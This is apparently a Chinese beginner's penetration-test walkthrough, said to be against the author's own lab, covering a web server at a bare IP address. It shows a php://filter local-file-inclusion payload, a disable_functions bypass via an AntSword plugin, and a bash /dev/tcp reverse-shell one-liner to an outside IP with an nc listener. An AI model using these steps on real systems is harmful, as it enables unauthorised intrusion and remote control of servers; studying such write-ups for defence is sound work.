目标:http://115.126.12.38:90/
当我打开这个网站发现空白界面什么都莫得有(就先随便看看吧),先右击查看一下源代码,我们发现出现#<!---- cat robots-back-hack.bak ----!>#,
试着去访问一下,发现可以下载,成功下载之后发现了两个禁止访问的目录,那么我们试着去使用7kb来进行扫描一下目录
通过扫描发现一个www.tar.gz的压缩包,我拿到linux服务器进行解压,查看,下面就是整个压缩包里面的文件了
下一步我查看backeropena.php文件,只要是稍微懂点代码的人都清楚,这里存在包含漏洞(本本地包含漏洞)
我试着去访问一下这个文件,物理路径爆出来了,那么我们试着使用php协议进行读取他的index.php首页文件看看,
php://filter/read=convert.base64-encode/resource=/www/wwwroot/115.126.12.38/index.php
已经读取出来了,beas加密,拿出来神器进行解码一下,不解码不知道,解开之后下一跳,这尼玛不就是shell嘛。。。。。,突然佩服命名shell的那位大佬了,(给祖师爷上香!!!)
我就这样稀里糊涂的拿到了shell,使用蚁剑进行连接,执行命令看看是什么权限
执行不了命令,查看一下phpinfo,发现函数都给禁用了。。。。
接下来得绕过disable_function才能进行下一步操作,找了好久,发现蚁剑的插件市场有的大佬写好的绕过工具,我得赶紧去试试哈哈哈嗝。
他成了,他成了,他迈着成功的步伐走来了!!!(总的来说,感谢大佬写的插件)
下一步当然是反弹shell了,
1.nc -vvlp 7777 监听
2.bash -c 'exec bash -i &>/dev/tcp/182.42.122.253/7777 <&1' 反弹
成功反弹shell
但是虽然能执行命令,但并不是root权限,还得想办法提权啊
我尝试了sudo提权,suid提权,命令(find等)提权,全部失败。。。
这篇文章是我第一次发表,也希望大佬嘴下留情,刚入安全圈没多久的小菜鸡,正怀着一颗炽热的心往前奔跑,这篇文章是我自己搭建的靶场,也也是在真实环境中遇到过类似的情况。
MHcloud一个对安全充满憧憬的小菜鸡